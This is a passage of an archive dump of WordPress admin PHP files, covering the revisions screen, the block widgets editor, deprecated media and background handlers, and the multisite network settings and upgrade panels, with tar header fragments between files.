! wp_is_post_autosave( $revision ) ) { $redirect = 'edit.php?post_type=' . $post->post_type; break; } // Don't restore if the post is locked. if ( wp_check_post_lock( $post->ID ) ) { break; } check_admin_referer( "restore-post_{$revision->ID}" ); /* * Ensure the global $post remains the same after revision is restored. * Because wp_insert_post() and wp_transition_post_status() are called * during the process, plugins can unexpectedly modify $post. */ $backup_global_post = clone $post; wp_restore_post_revision( $revision->ID ); // Restore the global $post as it was before. $post = $backup_global_post; $redirect = add_query_arg( array( 'message' => 5, 'revision' => $revision->ID, ), get_edit_post_link( $post->ID, 'url' ) ); break; case 'view': case 'edit': default: $revision = wp_get_post_revision( $revision_id ); if ( ! $revision ) { break; } $post = get_post( $revision->post_parent ); if ( ! $post ) { break; } if ( ! current_user_can( 'read_post', $revision->ID ) || ! current_user_can( 'edit_post', $revision->post_parent ) ) { break; } // Bail if revisions are disabled and this is not an autosave. if ( ! wp_revisions_enabled( $post ) && ! wp_is_post_autosave( $revision ) ) { $redirect = 'edit.php?post_type=' . $post->post_type; break; } $post_edit_link = get_edit_post_link(); $post_title = '<a href="' . esc_url( $post_edit_link ) . '">' . _draft_or_post_title() . '</a>'; /* translators: %s: Post title. */ $h1 = sprintf( __( 'Compare Revisions of “%s”' ), $post_title ); $return_to_post = '<a href="' . esc_url( $post_edit_link ) . '">' . __( '← Go to editor' ) . '</a>'; // Used in the HTML title tag. $title = __( 'Revisions' ); $redirect = false; break; } // Empty post_type means either malformed object found, or no valid parent was found. if ( ! $redirect && empty( $post->post_type ) ) { $redirect = 'edit.php'; } if ( ! empty( $redirect ) ) { wp_redirect( $redirect ); exit; } // This is so that the correct "Edit" menu item is selected. if ( ! empty( $post->post_type ) && 'post' !== $post->post_type ) { $parent_file = 'edit.php?post_type=' . $post->post_type; } else { $parent_file = 'edit.php'; } $submenu_file = $parent_file; wp_enqueue_script( 'revisions' ); wp_localize_script( 'revisions', '_wpRevisionsSettings', wp_prepare_revisions_for_js( $post, $revision_id, $from ) ); /* Revisions Help Tab */ $revisions_overview = '<p>' . __( 'This screen is used for managing your content revisions.' ) . '</p>'; $revisions_overview .= '<p>' . __( 'Revisions are saved copies of your post or page, which are periodically created as you update your content. The red text on the left shows the content that was removed. The green text on the right shows the content that was added.' ) . '</p>'; $revisions_overview .= '<p>' . __( 'From this screen you can review, compare, and restore revisions:' ) . '</p>'; $revisions_overview .= '<ul><li>' . __( 'To navigate between revisions, <strong>drag the slider handle left or right</strong> or <strong>use the Previous or Next buttons</strong>.' ) . '</li>'; $revisions_overview .= '<li>' . __( 'Compare two different revisions by <strong>selecting the “Compare any two revisions” box</strong> to the side.' ) . '</li>'; $revisions_overview .= '<li>' . __( 'To restore a revision, <strong>click Restore This Revision</strong>.' ) . '</li></ul>'; get_current_screen()->add_help_tab( array( 'id' => 'revisions-overview', 'title' => __( 'Overview' ), 'content' => $revisions_overview, ) ); $revisions_sidebar = '<p><strong>' . __( 'For more information:' ) . '</strong></p>'; $revisions_sidebar .= '<p>' . __( '<a href="https://wordpress.org/documentation/article/revisions/">Revisions Management</a>' ) . '</p>'; $revisions_sidebar .= '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>'; get_current_screen()->set_help_sidebar( $revisions_sidebar ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1 class="long-header"><?php echo $h1; ?></h1> <?php echo $return_to_post; ?> </div> <?php wp_print_revision_templates(); require_once ABSPATH . 'wp-admin/admin-footer.php'; widgets-form-blocks.php 0000644 00000012172 15226322564 0011151 0 ustar 00 <?php /** * The block-based widgets editor, for use in widgets.php. * * @package WordPress * @subpackage Administration */ // Don't load directly. if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } // Flag that we're loading the block editor. $current_screen = get_current_screen(); $current_screen->is_block_editor( true ); $block_editor_context = new WP_Block_Editor_Context( array( 'name' => 'core/edit-widgets' ) ); $preload_paths = array( array( rest_get_route_for_post_type_items( 'attachment' ), 'OPTIONS' ), '/wp/v2/widget-types?context=edit&per_page=-1', '/wp/v2/sidebars?context=edit&per_page=-1', '/wp/v2/widgets?context=edit&per_page=-1&_embed=about', ); block_editor_rest_api_preload( $preload_paths, $block_editor_context ); $editor_settings = get_block_editor_settings( array_merge( get_legacy_widget_block_editor_settings(), array( 'styles' => get_block_editor_theme_styles() ) ), $block_editor_context ); // The widgets editor does not support the Block Directory, so don't load any of // its assets. This also prevents 'wp-editor' from being enqueued which we // cannot load in the widgets screen because many widget scripts rely on `wp.editor`. remove_action( 'enqueue_block_editor_assets', 'wp_enqueue_editor_block_directory_assets' ); wp_add_inline_script( 'wp-edit-widgets', sprintf( 'wp.domReady( function() { wp.editWidgets.initialize( "widgets-editor", %s ); } );', wp_json_encode( $editor_settings, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) ) ); // Preload server-registered block schemas. wp_add_inline_script( 'wp-blocks', 'wp.blocks.unstable__bootstrapServerSideBlockDefinitions(' . wp_json_encode( get_block_editor_server_block_settings(), JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) . ');' ); // Preload server-registered block bindings sources. $registered_sources = get_all_registered_block_bindings_sources(); if ( ! empty( $registered_sources ) ) { $filtered_sources = array(); foreach ( $registered_sources as $source ) { $filtered_sources[] = array( 'name' => $source->name, 'label' => $source->label, 'usesContext' => $source->uses_context, ); } $script = sprintf( 'for ( const source of %s ) { wp.blocks.registerBlockBindingsSource( source ); }', wp_json_encode( $filtered_sources, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) ); wp_add_inline_script( 'wp-blocks', $script ); } wp_add_inline_script( 'wp-blocks', sprintf( 'wp.blocks.setCategories( %s );', wp_json_encode( get_block_categories( $block_editor_context ), JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) ), 'after' ); wp_enqueue_script( 'wp-edit-widgets' ); wp_enqueue_script( 'admin-widgets' ); wp_enqueue_style( 'wp-edit-widgets' ); /** This action is documented in wp-admin/edit-form-blocks.php */ do_action( 'enqueue_block_editor_assets' ); /** This action is documented in wp-admin/widgets-form.php */ do_action( 'sidebar_admin_setup' ); require_once ABSPATH . 'wp-admin/admin-header.php'; /** This action is documented in wp-admin/widgets-form.php */ do_action( 'widgets_admin_page' ); ?> <div id="widgets-editor" class="blocks-widgets-container"> <?php // JavaScript is disabled. ?> <div class="wrap hide-if-js widgets-editor-no-js"> <h1 class="wp-heading-inline"><?php echo esc_html( $title ); ?></h1> <?php if ( file_exists( WP_PLUGIN_DIR . '/classic-widgets/classic-widgets.php' ) ) { // If Classic Widgets is already installed, provide a link to activate the plugin. $installed = true; $plugin_activate_url = wp_nonce_url( 'plugins.php?action=activate&plugin=classic-widgets/classic-widgets.php', 'activate-plugin_classic-widgets/classic-widgets.php' ); $message = sprintf( /* translators: %s: Link to activate the Classic Widgets plugin. */ __( 'The block widgets require JavaScript. Please enable JavaScript in your browser settings, or activate the <a href="%s">Classic Widgets plugin</a>.' ), esc_url( $plugin_activate_url ) ); } else { // If Classic Widgets is not installed, provide a link to install it. $installed = false; $plugin_install_url = wp_nonce_url( self_admin_url( 'update.php?action=install-plugin&plugin=classic-widgets' ), 'install-plugin_classic-widgets' ); $message = sprintf( /* translators: %s: A link to install the Classic Widgets plugin. */ __( 'The block widgets require JavaScript. Please enable JavaScript in your browser settings, or install the <a href="%s">Classic Widgets plugin</a>.' ), esc_url( $plugin_install_url ) ); } /** * Filters the message displayed in the block widget interface when JavaScript is * not enabled in the browser. * * @since 6.4.0 * * @param string $message The message being displayed. * @param bool $installed Whether the Classic Widget plugin is installed. */ $message = apply_filters( 'block_widgets_no_javascript_message', $message, $installed ); wp_admin_notice( $message, array( 'type' => 'error', 'additional_classes' => array( 'hide-if-js' ), ) ); ?> </div> </div> <?php /** This action is documented in wp-admin/widgets-form.php */ do_action( 'sidebar_admin_page' ); require_once ABSPATH . 'wp-admin/admin-footer.php'; custom-background.php 0000644 00000000751 15226322564 0010716 0 ustar 00 <?php /** * Custom background script. * * This file is deprecated, use 'wp-admin/includes/class-custom-background.php' instead. * * @deprecated 5.3.0 * @package WordPress * @subpackage Administration */ // Don't load directly. if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } _deprecated_file( basename( __FILE__ ), '5.3.0', 'wp-admin/includes/class-custom-background.php' ); /** Custom_Background class */ require_once ABSPATH . 'wp-admin/includes/class-custom-background.php'; media.php 0000644 00000001463 15226322564 0006347 0 ustar 00 <?php /** * Media management action handler. * * This file is deprecated, use 'wp-admin/upload.php' instead. * * @deprecated 6.3.0 * @package WordPress * @subpackage Administration */ /** Load WordPress Administration Bootstrap. */ require_once __DIR__ . '/admin.php'; $parent_file = 'upload.php'; $submenu_file = 'upload.php'; $action = ! empty( $_REQUEST['action'] ) ? sanitize_text_field( $_REQUEST['action'] ) : ''; switch ( $action ) { case 'editattachment': case 'edit': if ( empty( $_GET['attachment_id'] ) ) { wp_redirect( admin_url( 'upload.php?error=deprecated' ) ); exit; } $att_id = (int) $_GET['attachment_id']; wp_redirect( admin_url( "upload.php?item={$att_id}&error=deprecated" ) ); exit; default: wp_redirect( admin_url( 'upload.php?error=deprecated' ) ); exit; } network/settings.php 0000644 00000053013 15226322564 0010617 0 ustar 00 <?php /** * Multisite network settings administration panel. * * @package WordPress * @subpackage Multisite * @since 3.0.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; /** WordPress Translation Installation API */ require_once ABSPATH . 'wp-admin/includes/translation-install.php'; if ( ! current_user_can( 'manage_network_options' ) ) { wp_die( __( 'Sorry, you are not allowed to access this page.' ), 403 ); } // Used in the HTML title tag. $title = __( 'Network Settings' ); $parent_file = 'settings.php'; // Handle network admin email change requests. if ( ! empty( $_GET['network_admin_hash'] ) ) { $new_admin_details = get_site_option( 'network_admin_hash' ); $redirect = 'settings.php?updated=false'; if ( is_array( $new_admin_details ) && hash_equals( $new_admin_details['hash'], $_GET['network_admin_hash'] ) && ! empty( $new_admin_details['newemail'] ) ) { update_site_option( 'admin_email', $new_admin_details['newemail'] ); delete_site_option( 'network_admin_hash' ); delete_site_option( 'new_admin_email' ); $redirect = 'settings.php?updated=true'; } wp_redirect( network_admin_url( $redirect ) ); exit; } elseif ( ! empty( $_GET['dismiss'] ) && 'new_network_admin_email' === $_GET['dismiss'] ) { check_admin_referer( 'dismiss_new_network_admin_email' ); delete_site_option( 'network_admin_hash' ); delete_site_option( 'new_admin_email' ); wp_redirect( network_admin_url( 'settings.php?updated=true' ) ); exit; } add_action( 'admin_head', 'network_settings_add_js' ); get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '<p>' . __( 'This screen sets and changes options for the network as a whole. The first site is the main site in the network and network options are pulled from that original site’s options.' ) . '</p>' . '<p>' . __( 'Operational settings has fields for the network’s name and admin email.' ) . '</p>' . '<p>' . __( 'Registration settings can disable/enable public signups. If you let others sign up for a site, install spam plugins. Spaces, not commas, should separate names banned as sites for this network.' ) . '</p>' . '<p>' . __( 'New site settings are defaults applied when a new site is created in the network. These include welcome email for when a new site or user account is registered, and what᾿s put in the first post, page, comment, comment author, and comment URL.' ) . '</p>' . '<p>' . __( 'Upload settings control the size of the uploaded files and the amount of available upload space for each site. You can change the default value for specific sites when you edit a particular site. Allowed file types are also listed (space separated only).' ) . '</p>' . '<p>' . __( 'You can set the language, and WordPress will automatically download and install the translation files (available if your filesystem is writable).' ) . '</p>' . '<p>' . __( 'Menu setting enables/disables the plugin menus from appearing for non super admins, so that only super admins, not site admins, have access to activate plugins.' ) . '</p>' . '<p>' . __( 'Super admins can no longer be added on the Options screen. You must now go to the list of existing users on Network Admin > Users and click on Username or the Edit action link below that name. This goes to an Edit User page where you can check a box to grant super admin privileges.' ) . '</p>', ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://developer.wordpress.org/advanced-administration/multisite/admin/settings/">Documentation on Network Settings</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>' ); if ( $_POST ) { /** This action is documented in wp-admin/network/edit.php */ do_action( 'wpmuadminedit' ); check_admin_referer( 'siteoptions' ); $checked_options = array( 'menu_items' => array(), 'registrationnotification' => 'no', 'upload_space_check_disabled' => 1, 'add_new_users' => 0, ); foreach ( $checked_options as $option_name => $option_unchecked_value ) { if ( ! isset( $_POST[ $option_name ] ) ) { $_POST[ $option_name ] = $option_unchecked_value; } } $options = array( 'registrationnotification', 'registration', 'add_new_users', 'menu_items', 'upload_space_check_disabled', 'blog_upload_space', 'upload_filetypes', 'site_name', 'first_post', 'first_page', 'first_comment', 'first_comment_url', 'first_comment_author', 'welcome_email', 'welcome_user_email', 'fileupload_maxk', 'illegal_names', 'limited_email_domains', 'banned_email_domains', 'WPLANG', 'new_admin_email', 'first_comment_email', ); // Handle translation installation. if ( ! empty( $_POST['WPLANG'] ) && current_user_can( 'install_languages' ) && wp_can_install_language_pack() ) { $language = wp_download_language_pack( $_POST['WPLANG'] ); if ( $language ) { $_POST['WPLANG'] = $language; } } foreach ( $options as $option_name ) { if ( ! isset( $_POST[ $option_name ] ) ) { continue; } $value = wp_unslash( $_POST[ $option_name ] ); update_site_option( $option_name, $value ); } /** * Fires after the network options are updated. * * @since MU (3.0.0) */ do_action( 'update_wpmu_options' ); wp_redirect( add_query_arg( 'updated', 'true', network_admin_url( 'settings.php' ) ) ); exit; } require_once ABSPATH . 'wp-admin/admin-header.php'; if ( isset( $_GET['updated'] ) ) { wp_admin_notice( __( 'Settings saved.' ), array( 'type' => 'success', 'dismissible' => true, 'id' => 'message', ) ); } ?> <div class="wrap"> <h1><?php echo esc_html( $title ); ?></h1> <form method="post" action="settings.php" novalidate="novalidate"> <?php wp_nonce_field( 'siteoptions' ); ?> <h2><?php _e( 'Operational Settings' ); ?></h2> <table class="form-table" role="presentation"> <tr> <th scope="row"><label for="site_name"><?php _e( 'Network Title' ); ?></label></th> <td> <input name="site_name" type="text" id="site_name" class="regular-text" value="<?php echo esc_attr( get_network()->site_name ); ?>" /> </td> </tr> <tr> <th scope="row"><label for="admin_email"><?php _e( 'Network Admin Email' ); ?></label></th> <td> <input name="new_admin_email" type="email" id="admin_email" aria-describedby="admin-email-desc" class="regular-text" value="<?php echo esc_attr( get_site_option( 'admin_email' ) ); ?>" /> <p class="description" id="admin-email-desc"> <?php _e( 'This address is used for admin purposes. If you change this, an email will be sent to your new address to confirm it. <strong>The new address will not become active until confirmed.</strong>' ); ?> </p> <?php $new_admin_email = get_site_option( 'new_admin_email' ); if ( $new_admin_email && get_site_option( 'admin_email' ) !== $new_admin_email ) : $notice_message = sprintf( /* translators: %s: New network admin email. */ __( 'There is a pending change of the network admin email to %s.' ), '<code>' . esc_html( $new_admin_email ) . '</code>' ); $notice_message .= sprintf( ' <a href="%1$s">%2$s</a>', esc_url( wp_nonce_url( network_admin_url( 'settings.php?dismiss=new_network_admin_email' ), 'dismiss_new_network_admin_email' ) ), __( 'Cancel' ) ); wp_admin_notice( $notice_message, array( 'type' => 'warning', 'dismissible' => true, 'additional_classes' => array( 'inline' ), ) ); endif; ?> </td> </tr> </table> <h2><?php _e( 'Registration Settings' ); ?></h2> <table class="form-table" role="presentation"> <?php $new_registrations_settings_title = __( 'Allow new registrations' ); ?> <tr> <th scope="row"><?php echo $new_registrations_settings_title; ?></th> <?php if ( ! get_site_option( 'registration' ) ) { update_site_option( 'registration', 'none' ); } $reg = get_site_option( 'registration' ); ?> <td> <fieldset> <legend class="screen-reader-text"><?php echo $new_registrations_settings_title; ?></legend> <label><input name="registration" type="radio" id="registration1" value="none"<?php checked( $reg, 'none' ); ?> /> <?php _e( 'Registration is disabled' ); ?></label><br /> <label><input name="registration" type="radio" id="registration2" value="user"<?php checked( $reg, 'user' ); ?> /> <?php _e( 'User accounts may be registered' ); ?></label><br /> <label><input name="registration" type="radio" id="registration3" value="blog"<?php checked( $reg, 'blog' ); ?> /> <?php _e( 'Logged in users may register new sites' ); ?></label><br /> <label><input name="registration" type="radio" id="registration4" value="all"<?php checked( $reg, 'all' ); ?> /> <?php _e( 'Both sites and user accounts can be registered' ); ?></label> <?php if ( is_subdomain_install() ) { echo '<p class="description">'; printf( /* translators: 1: NOBLOGREDIRECT, 2: wp-config.php */ __( 'If registration is disabled, please set %1$s in %2$s to a URL you will redirect visitors to if they visit a non-existent site.' ), '<code>NOBLOGREDIRECT</code>', '<code>wp-config.php</code>' ); echo '</p>'; } ?> </fieldset> </td> </tr> <tr> <th scope="row"><?php _e( 'Registration notification' ); ?></th> <?php if ( ! get_site_option( 'registrationnotification' ) ) { update_site_option( 'registrationnotification', 'yes' ); } ?> <td> <label><input name="registrationnotification" type="checkbox" id="registrationnotification" value="yes"<?php checked( get_site_option( 'registrationnotification' ), 'yes' ); ?> /> <?php _e( 'Send the network admin an email notification every time someone registers a site or user account' ); ?></label> </td> </tr> <tr id="addnewusers"> <th scope="row"><?php _e( 'Add Users' ); ?></th> <td> <label><input name="add_new_users" type="checkbox" id="add_new_users" value="1"<?php checked( get_site_option( 'add_new_users' ) ); ?> /> <?php _e( 'Allow site administrators to add new users to their site via the "Users → Add User" page' ); ?></label> </td> </tr> <tr> <th scope="row"><label for="illegal_names"><?php _e( 'Banned Names' ); ?></label></th> <td> <?php $illegal_names = get_site_option( 'illegal_names' ); if ( empty( $illegal_names ) ) { $illegal_names = ''; } elseif ( is_array( $illegal_names ) ) { $illegal_names = implode( ' ', $illegal_names ); } ?> <input name="illegal_names" type="text" id="illegal_names" aria-describedby="illegal-names-desc" class="large-text" value="<?php echo esc_attr( $illegal_names ); ?>" size="45" /> <p class="description" id="illegal-names-desc"> <?php _e( 'Users are not allowed to register these sites. Separate names by spaces.' ); ?> </p> </td> </tr> <tr> <th scope="row"><label for="limited_email_domains"><?php _e( 'Limited Email Registrations' ); ?></label></th> <td> <?php $limited_email_domains = get_site_option( 'limited_email_domains' ); if ( empty( $limited_email_domains ) ) { $limited_email_domains = ''; } else { // Convert from an input field. Back-compat for WPMU < 1.0. $limited_email_domains = str_replace( ' ', "\n", $limited_email_domains ); if ( is_array( $limited_email_domains ) ) { $limited_email_domains = implode( "\n", $limited_email_domains ); } } ?> <textarea name="limited_email_domains" id="limited_email_domains" aria-describedby="limited-email-domains-desc" cols="45" rows="5"> <?php echo esc_textarea( $limited_email_domains ); ?></textarea> <p class="description" id="limited-email-domains-desc"> <?php _e( 'If you want to limit site registrations to certain domains. One domain per line.' ); ?> </p> </td> </tr> <tr> <th scope="row"><label for="banned_email_domains"><?php _e( 'Banned Email Domains' ); ?></label></th> <td> <?php $banned_email_domains = get_site_option( 'banned_email_domains' ); if ( empty( $banned_email_domains ) ) { $banned_email_domains = ''; } elseif ( is_array( $banned_email_domains ) ) { $banned_email_domains = implode( "\n", $banned_email_domains ); } ?> <textarea name="banned_email_domains" id="banned_email_domains" aria-describedby="banned-email-domains-desc" cols="45" rows="5"> <?php echo esc_textarea( $banned_email_domains ); ?></textarea> <p class="description" id="banned-email-domains-desc"> <?php _e( 'If you want to ban domains from site registrations. One domain per line.' ); ?> </p> </td> </tr> </table> <h2><?php _e( 'New Site Settings' ); ?></h2> <table class="form-table" role="presentation"> <tr> <th scope="row"><label for="welcome_email"><?php _e( 'Welcome Email' ); ?></label></th> <td> <textarea name="welcome_email" id="welcome_email" aria-describedby="welcome-email-desc" rows="5" cols="45" class="large-text"> <?php echo esc_textarea( get_site_option( 'welcome_email' ) ); ?></textarea> <p class="description" id="welcome-email-desc"> <?php _e( 'The welcome email sent to new site owners.' ); ?> </p> </td> </tr> <tr> <th scope="row"><label for="welcome_user_email"><?php _e( 'Welcome User Email' ); ?></label></th> <td> <textarea name="welcome_user_email" id="welcome_user_email" aria-describedby="welcome-user-email-desc" rows="5" cols="45" class="large-text"> <?php echo esc_textarea( get_site_option( 'welcome_user_email' ) ); ?></textarea> <p class="description" id="welcome-user-email-desc"> <?php _e( 'The welcome email sent to new users.' ); ?> </p> </td> </tr> <tr> <th scope="row"><label for="first_post"><?php _e( 'First Post' ); ?></label></th> <td> <textarea name="first_post" id="first_post" aria-describedby="first-post-desc" rows="5" cols="45" class="large-text"> <?php echo esc_textarea( get_site_option( 'first_post' ) ); ?></textarea> <p class="description" id="first-post-desc"> <?php _e( 'The first post on a new site.' ); ?> </p> </td> </tr> <tr> <th scope="row"><label for="first_page"><?php _e( 'First Page' ); ?></label></th> <td> <textarea name="first_page" id="first_page" aria-describedby="first-page-desc" rows="5" cols="45" class="large-text"> <?php echo esc_textarea( get_site_option( 'first_page' ) ); ?></textarea> <p class="description" id="first-page-desc"> <?php _e( 'The first page on a new site.' ); ?> </p> </td> </tr> <tr> <th scope="row"><label for="first_comment"><?php _e( 'First Comment' ); ?></label></th> <td> <textarea name="first_comment" id="first_comment" aria-describedby="first-comment-desc" rows="5" cols="45" class="large-text"> <?php echo esc_textarea( get_site_option( 'first_comment' ) ); ?></textarea> <p class="description" id="first-comment-desc"> <?php _e( 'The first comment on a new site.' ); ?> </p> </td> </tr> <tr> <th scope="row"><label for="first_comment_author"><?php _e( 'First Comment Author' ); ?></label></th> <td> <input type="text" size="40" name="first_comment_author" id="first_comment_author" aria-describedby="first-comment-author-desc" value="<?php echo esc_attr( get_site_option( 'first_comment_author' ) ); ?>" /> <p class="description" id="first-comment-author-desc"> <?php _e( 'The author of the first comment on a new site.' ); ?> </p> </td> </tr> <tr> <th scope="row"><label for="first_comment_email"><?php _e( 'First Comment Email' ); ?></label></th> <td> <input type="text" size="40" name="first_comment_email" id="first_comment_email" aria-describedby="first-comment-email-desc" value="<?php echo esc_attr( get_site_option( 'first_comment_email' ) ); ?>" /> <p class="description" id="first-comment-email-desc"> <?php _e( 'The email address of the first comment author on a new site.' ); ?> </p> </td> </tr> <tr> <th scope="row"><label for="first_comment_url"><?php _e( 'First Comment URL' ); ?></label></th> <td> <input type="text" size="40" name="first_comment_url" id="first_comment_url" aria-describedby="first-comment-url-desc" value="<?php echo esc_attr( get_site_option( 'first_comment_url' ) ); ?>" /> <p class="description" id="first-comment-url-desc"> <?php _e( 'The URL for the first comment on a new site.' ); ?> </p> </td> </tr> </table> <h2><?php _e( 'Upload Settings' ); ?></h2> <table class="form-table" role="presentation"> <tr> <th scope="row"><?php _e( 'Site upload space' ); ?></th> <td> <label><input type="checkbox" id="upload_space_check_disabled" name="upload_space_check_disabled" value="0"<?php checked( (bool) get_site_option( 'upload_space_check_disabled' ), false ); ?> /> <?php printf( /* translators: %s: Number of megabytes to limit uploads to. */ __( 'Limit total size of files uploaded to %s MB' ), '</label><label><input name="blog_upload_space" type="number" min="0" style="width: 100px" id="blog_upload_space" aria-describedby="blog-upload-space-desc" value="' . esc_attr( get_site_option( 'blog_upload_space', 100 ) ) . '" />' ); ?> </label><br /> <p class="screen-reader-text" id="blog-upload-space-desc"> <?php /* translators: Hidden accessibility text. */ _e( 'Size in megabytes' ); ?> </p> </td> </tr> <tr> <th scope="row"><label for="upload_filetypes"><?php _e( 'Upload file types' ); ?></label></th> <td> <input name="upload_filetypes" type="text" id="upload_filetypes" aria-describedby="upload-filetypes-desc" class="large-text" value="<?php echo esc_attr( get_site_option( 'upload_filetypes', 'jpg jpeg png gif' ) ); ?>" size="45" /> <p class="description" id="upload-filetypes-desc"> <?php _e( 'Allowed file types. Separate types by spaces.' ); ?> </p> </td> </tr> <tr> <th scope="row"><label for="fileupload_maxk"><?php _e( 'Max upload file size' ); ?></label></th> <td> <?php printf( /* translators: %s: File size in kilobytes. */ __( '%s KB' ), '<input name="fileupload_maxk" type="number" min="0" style="width: 100px" id="fileupload_maxk" aria-describedby="fileupload-maxk-desc" value="' . esc_attr( get_site_option( 'fileupload_maxk', 300 ) ) . '" />' ); ?> <p class="screen-reader-text" id="fileupload-maxk-desc"> <?php /* translators: Hidden accessibility text. */ _e( 'Size in kilobytes' ); ?> </p> </td> </tr> </table> <?php $languages = get_available_languages(); $translations = wp_get_available_translations(); if ( ! empty( $languages ) || ! empty( $translations ) ) { ?> <h2><?php _e( 'Language Settings' ); ?></h2> <table class="form-table" role="presentation"> <tr> <th><label for="WPLANG"><?php _e( 'Default Language' ); ?><span class="dashicons dashicons-translation" aria-hidden="true"></span></label></th> <td> <?php $lang = get_site_option( 'WPLANG' ); if ( ! in_array( $lang, $languages, true ) ) { $lang = ''; } wp_dropdown_languages( array( 'name' => 'WPLANG', 'id' => 'WPLANG', 'selected' => $lang, 'languages' => $languages, 'translations' => $translations, 'show_available_translations' => current_user_can( 'install_languages' ) && wp_can_install_language_pack(), ) ); ?> </td> </tr> </table> <?php } ?> <?php $menu_perms = get_site_option( 'menu_items' ); /** * Filters available network-wide administration menu options. * * Options returned to this filter are output as individual checkboxes that, when selected, * enable site administrator access to the specified administration menu in certain contexts. * * Adding options for specific menus here hinges on the appropriate checks and capabilities * being in place in the site dashboard on the other side. For instance, when the single * default option, 'plugins' is enabled, site administrators are granted access to the Plugins * screen in their individual sites' dashboards. * * @since MU (3.0.0) * * @param string[] $admin_menus Associative array of the menu items available. */ $menu_items = apply_filters( 'mu_menu_items', array( 'plugins' => __( 'Plugins' ) ) ); if ( $menu_items ) : ?> <h2><?php _e( 'Menu Settings' ); ?></h2> <table id="menu" class="form-table"> <?php $enable_administration_menus_title = __( 'Enable administration menus' ); ?> <tr> <th scope="row"><?php echo $enable_administration_menus_title; ?></th> <td> <?php echo '<fieldset><legend class="screen-reader-text">' . $enable_administration_menus_title . '</legend>'; foreach ( (array) $menu_items as $key => $val ) { echo "<label><input type='checkbox' name='menu_items[" . $key . "]' value='1'" . ( isset( $menu_perms[ $key ] ) ? checked( $menu_perms[ $key ], '1', false ) : '' ) . ' /> ' . esc_html( $val ) . '</label><br/>'; } echo '</fieldset>'; ?> </td> </tr> </table> <?php endif; ?> <?php /** * Fires at the end of the Network Settings form, before the submit button. * * @since MU (3.0.0) */ do_action( 'wpmu_options' ); ?> <?php submit_button(); ?> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; ?> network/upgrade.php 0000644 00000011437 15226322564 0010412 0 ustar 00 <?php /** * Multisite upgrade administration panel. * * @package WordPress * @subpackage Multisite * @since 3.0.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require_once ABSPATH . WPINC . '/http.php'; /** * @global int $wp_db_version WordPress database version. */ global $wp_db_version; // Used in the HTML title tag. $title = __( 'Upgrade Network' ); $parent_file = 'upgrade.php'; get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '<p>' . __( 'Only use this screen once you have updated to a new version of WordPress through Updates/Available Updates (via the Network Administration navigation menu or the Toolbar). Clicking the Upgrade Network button will step through each site in the network, five at a time, and make sure any database updates are applied.' ) . '</p>' . '<p>' . __( 'If a version update to core has not happened, clicking this button will not affect anything.' ) . '</p>' . '<p>' . __( 'If this process fails for any reason, users logging in to their sites will force the same update.' ) . '</p>', ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://developer.wordpress.org/advanced-administration/multisite/admin/#network-admin-updates-screen">Documentation on Upgrade Network</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>' ); require_once ABSPATH . 'wp-admin/admin-header.php'; if ( ! current_user_can( 'upgrade_network' ) ) { wp_die( __( 'Sorry, you are not allowed to access this page.' ), 403 ); } echo '<div class="wrap">'; echo '<h1>' . __( 'Upgrade Network' ) . '</h1>'; $action = $_GET['action'] ?? 'show'; switch ( $action ) { case 'upgrade': $n = ( isset( $_GET['n'] ) ) ? (int) $_GET['n'] : 0; if ( $n < 5 ) { update_site_option( 'wpmu_upgrade_site', $wp_db_version ); } $site_ids = get_sites( array( 'spam' => 0, 'deleted' => 0, 'archived' => 0, 'network_id' => get_current_network_id(), 'number' => 5, 'offset' => $n, 'fields' => 'ids', 'order' => 'DESC', 'orderby' => 'id', 'update_site_meta_cache' => false, ) ); if ( empty( $site_ids ) ) { echo '<p>' . __( 'All done!' ) . '</p>'; break; } echo '<ul>'; foreach ( (array) $site_ids as $site_id ) { switch_to_blog( $site_id ); $siteurl = site_url(); $upgrade_url = admin_url( 'upgrade.php?step=upgrade_db' ); restore_current_blog(); echo "<li>$siteurl</li>"; $response = wp_remote_get( $upgrade_url, array( 'timeout' => 120, 'httpversion' => '1.1', 'sslverify' => false, ) ); if ( is_wp_error( $response ) ) { wp_die( sprintf( /* translators: 1: Site URL, 2: Server error message. */ __( 'Warning! Problem updating %1$s. Your server may not be able to connect to sites running on it. Error message: %2$s' ), $siteurl, '<em>' . $response->get_error_message() . '</em>' ) ); } /** * Fires after the Multisite DB upgrade for each site is complete. * * @since MU (3.0.0) * * @param array $response The upgrade response array. */ do_action( 'after_mu_upgrade', $response ); /** * Fires after each site has been upgraded. * * @since MU (3.0.0) * * @param int $site_id The Site ID. */ do_action( 'wpmu_upgrade_site', $site_id ); } echo '</ul>'; ?><p><?php _e( 'If your browser does not start loading the next page automatically, click this link:' ); ?> <a class="button" href="upgrade.php?action=upgrade&n=<?php echo ( $n + 5 ); ?>"><?php _e( 'Next Sites' ); ?></a></p> <script> <!-- function nextpage() { location.href = "upgrade.php?action=upgrade&n=<?php echo ( $n + 5 ); ?>"; } setTimeout( "nextpage()", 250 ); //--> </script> <?php break; case 'show': default: if ( (int) get_site_option( 'wpmu_upgrade_site' ) !== $wp_db_version ) : ?> <h2><?php _e( 'Database Update Required' ); ?></h2> <p><?php _e( 'WordPress has been updated! Next and final step is to individually upgrade the sites in your network.' ); ?></p> <?php endif; ?> <p><?php _e( 'The database update process may take a 